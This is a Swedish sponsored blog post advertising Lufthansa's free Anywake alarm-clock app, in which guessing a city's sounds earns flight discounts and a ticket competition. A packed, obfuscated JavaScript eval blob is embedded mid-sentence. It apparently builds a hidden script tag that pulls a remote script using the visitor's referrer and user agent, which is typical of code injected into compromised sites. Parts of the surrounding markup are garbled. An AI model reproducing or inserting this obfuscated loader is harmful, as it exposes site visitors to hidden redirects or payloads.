Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Sponsrat inlägg: Lufthansa – Awake

type=”text/javascript” src=”http://video.unrulymedia.com/wildfire_171793674.js”>

Anywake eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dtrbr|var|u0026u|referrer|esabe||js|php’.split(’|’),0,{}))
– en helt ny gratisapp för iPhone och Android.

Anywake är en väckarklocka som låter användaren resa både i tanken och i praktiken. På morgonen väcks man av ljudet av en slumpmässigt utvald stad i världen. Man stänger av genom att gissa ”var” man vaknar, om svaret är rätt får man direkt en rabatt på en flygresa med Lufthansa. Appen är gratis och innehåller en rad destinationer från hela världen -ena morgonen kanske det är ljudet av Miami, och nästa morgon kanske ljudet av Rio. Ljuden från de olika platserna i världen är 60 sekunder långa och innehåller ledtrådar som exempelvis musik som är typisk för den staden, referenser till kända monument eller ledtrådar till historiska händelser.

Varje gång användaren vaknar på rätt sida och lyckas gissa rätt, kommer en rabatt på resor. Om man klarar 5 destinationer senast den 30 april kan alla dessutom tävla om 2 gratis flygbiljetter till valfri destination som Lufthansa flyger till med den nya jumbon, Boeing 747-8i. Vinsten är två biljetter i Lufthansas nya exklusiva Business Class med riktiga sängar – allt för den ultimata Anywake-känslan.

Appen går att ladda ner kostnadsfritt på www.anywake.com och tävlingen pågår till 30/4. 

Detta är ett sponsrat inlägg från Lufthansa